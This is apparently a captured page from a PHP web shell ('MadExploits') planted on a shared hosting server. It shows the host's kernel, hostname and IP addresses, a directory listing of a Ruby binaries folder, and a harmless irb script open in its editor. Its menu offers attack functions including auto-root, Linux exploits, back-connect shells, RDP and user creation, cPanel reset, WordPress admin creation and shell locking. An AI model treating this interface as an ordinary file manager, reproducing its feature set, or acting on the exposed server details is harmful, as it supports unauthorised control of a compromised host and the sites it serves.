Linux host56.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 198.54.126.10 | : 216.73.216.38
Cant Read [ /etc/named.conf ]
8.1.33
vaideehi
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
erb
3.8
KB
-rwxr-xr-x
gem
894
B
-rwxr-xr-x
irb
384
B
-rwxr-xr-x
rackup
459
B
-rwxr-xr-x
rdoc
1.51
KB
-rwxr-xr-x
ri
1.46
KB
-rwxr-xr-x
ruby
7.94
KB
-rwxr-xr-x
testrb
158
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : irb
#!/opt/alt/ruby18/bin/ruby # # irb.rb - intaractive ruby # $Release Version: 0.9.5 $ # $Revision: 11708 $ # $Date: 2007-02-13 08:01:19 +0900 (Tue, 13 Feb 2007) $ # by Keiju ISHITSUKA(keiju@ruby-lang.org) # require "irb" if __FILE__ == $0 IRB.start(__FILE__) else # check -e option if /^-e$/ =~ $0 IRB.start(__FILE__) else IRB.setup(__FILE__) end end
Close